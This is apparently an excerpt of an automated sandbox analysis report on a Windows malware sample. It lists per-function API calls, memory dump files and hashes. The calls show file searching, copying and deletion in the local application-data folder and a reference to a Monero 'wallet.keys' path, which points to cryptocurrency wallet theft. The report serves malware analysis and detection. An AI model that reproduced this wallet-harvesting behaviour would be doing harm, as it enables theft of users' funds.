Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905

lstrlen.KERNEL32(00000000), ref: 0069B16A
lstrlen.KERNEL32(00000000), ref: 0069B17E

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 9df0ded150630298da331e20b00a54173f9958bfc79684471d1724585ba419f4
Instruction ID: 4c2a664d2b430625d6bb711d7e9de6653b759758c5e0d9f90dfab00d94360032
Opcode Fuzzy Hash: 9df0ded150630298da331e20b00a54173f9958bfc79684471d1724585ba419f4
Instruction Fuzzy Hash: 8191FD729111089BDB88FBE0DC96DEE737AAF15300F50425EB507A6091EF346E49CFA6

Function 0069B230 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,01359078,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905

lstrlen.KERNEL32(00000000), ref: 0069B42E
lstrlen.KERNEL32(00000000), ref: 0069B442

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 3df78a64affe3dd68f37457e366e1092277992609afa3a360466e73ea72c4bcb
Instruction ID: e767b3f98c175963a9df1d66b964e6dc9257155bd1a8efc70378b37c3c02ef4d
Opcode Fuzzy Hash: 3df78a64affe3dd68f37457e366e1092277992609afa3a360466e73ea72c4bcb
Instruction Fuzzy Hash: EA710D719111089ADB88FBE0DD56DEE737ABF55300F50411EB503A6191EF34AE09CFA6

Function 006A4BB0 Relevance: 2.6, APIs: 2, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 006A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006A8E0B

lstrcat.KERNEL32(?,00000000), ref: 006A4BEA
lstrcat.KERNEL32(?,0135DCE0), ref: 006A4C08

Part of subcall function 006A4910: wsprintfA.USER32 ref: 006A492C
Part of subcall function 006A4910: FindFirstFileA.KERNEL32(?,?), ref: 006A4943

Part of subcall function 006A4910: StrCmpCA.SHLWAPI(?,006B0FDC), ref: 006A4971
Part of subcall function 006A4910: StrCmpCA.SHLWAPI(?,006B0FE0), ref: 006A4987
Part of subcall function 006A4910: FindNextFileA.KERNEL32(000000FF,?), ref: 006A4B7D
Part of subcall function 006A4910: FindClose.KERNEL32(000000FF), ref: 006A4B92

Part of subcall function 006A4910: wsprintfA.USER32 ref: 006A49B0
Part of subcall function 006A4910: StrCmpCA.SHLWAPI(?,006B08D2), ref: 006A49C5
Part of subcall function 006A4910: wsprintfA.USER32 ref: 006A49E2
Part of subcall function 006A4910: PathMatchSpecA.SHLWAPI(?,?), ref: 006A4A1E
Part of subcall function 006A4910: lstrcat.KERNEL32(?,0135E838), ref: 006A4A4A
Part of subcall function 006A4910: lstrcat.KERNEL32(?,006B0FF8), ref: 006A4A5C
Part of subcall function 006A4910: lstrcat.KERNEL32(?,?), ref: 006A4A70
Part of subcall function 006A4910: lstrcat.KERNEL32(?,006B0FFC), ref: 006A4A82
Part of subcall function 006A4910: lstrcat.KERNEL32(?,?), ref: 006A4A96
Part of subcall function 006A4910: CopyFileA.KERNEL32(?,?,00000001), ref: 006A4AAC
Part of subcall function 006A4910: DeleteFileA.KERNEL32(?), ref: 006A4B31

Part of subcall function 006A4910: wsprintfA.USER32 ref: 006A4A07

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: b16d7a1a50e5bb6d1d9f1619d1f20fe5b7498210d2f85208069cec4d81346fd8
Instruction ID: 1533eda5cb837b6bb638fe1286cd33715396c2908801765af55ab0e52396c6cc
Opcode Fuzzy Hash: b16d7a1a50e5bb6d1d9f1619d1f20fe5b7498210d2f85208069cec4d81346fd8
Instruction Fuzzy Hash: 4241A7F65001046BDBD8F7A4EC42EEE333EB785700F50864DB54557186EE755B888BA2

Function 00696660 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00696706
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00696753

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f386907c94223d6771cf46c71ec9a40efc8bdb977fa0ec2c4a4a9eb0c3a2fd18
Instruction ID: e1ea06ed942d0a0df275e627c089004882d1758909a1fe47f62205618383f430
Opcode Fuzzy Hash: f386907c94223d6771cf46c71ec9a40efc8bdb977fa0ec2c4a4a9eb0c3a2fd18
Instruction Fuzzy Hash: CF41CB74A00209EFCB44CF98C494BADBBB6FF44314F2482A9E9599B755D731EA81CF84

Function 006A5050 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 006A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006A8E0B

lstrcat.KERNEL32(?,00000000), ref: 006A508A
lstrcat.KERNEL32(?,0135E3F8), ref: 006A50A8

Part of subcall function 006A4910: wsprintfA.USER32 ref: 006A492C
Part of subcall function 006A4910: FindFirstFileA.KERNEL32(?,?), ref: 006A4943

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: 6cf3eb2c81c1d7b807a60734d1f15e5b0c0d4369b240ac02b079adb3b3a890a1
Instruction ID: 696f84fa6d8792fbcefee88310954a1f68a54b25830b043045a29ef8b336193c
Opcode Fuzzy Hash: 6cf3eb2c81c1d7b807a60734d1f15e5b0c0d4369b240ac02b079adb3b3a890a1
Instruction Fuzzy Hash: 9E0188B69002085BCB94FBB0DC42EEE737DAB55300F004659B64A57191EE749A88CFA6

Function 006910A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 006910B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 006910F7

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: c96eeb9b53b05a3ea330fb6a75bb3e0afbba80f7cc68fa6e072178efff4e70b6
Instruction ID: 2f885508560eb3147bf85ba41b9233855b7396c67be83b70d7ed345f3221c916
Opcode Fuzzy Hash: c96eeb9b53b05a3ea330fb6a75bb3e0afbba80f7cc68fa6e072178efff4e70b6
Instruction Fuzzy Hash: C5F0E971641204BBEB149AA49C49FEFB7DCE705715F300548F504E7380D5725E00DA64

Function 006A8D90 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,00691B54,?,?,006B564C,?,?,006B0E1F), ref: 006A8D9F

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: ab25f2884470d01209dc63426a26f2e6c3a1e15768b144c1d5b2438144cafd5d
Instruction ID: 1b3afe36c61a3ded73ddd7ed83a9ee2d708e27e9b76933c3919a7edbb2c5f84e
Opcode Fuzzy Hash: ab25f2884470d01209dc63426a26f2e6c3a1e15768b144c1d5b2438144cafd5d
Instruction Fuzzy Hash: A0F09270D01208ABCB04FFA4D5496ECBB75EB12310F10829AE866A7391DB746E56DF85

Function 006A8DE0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006A8E0B

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
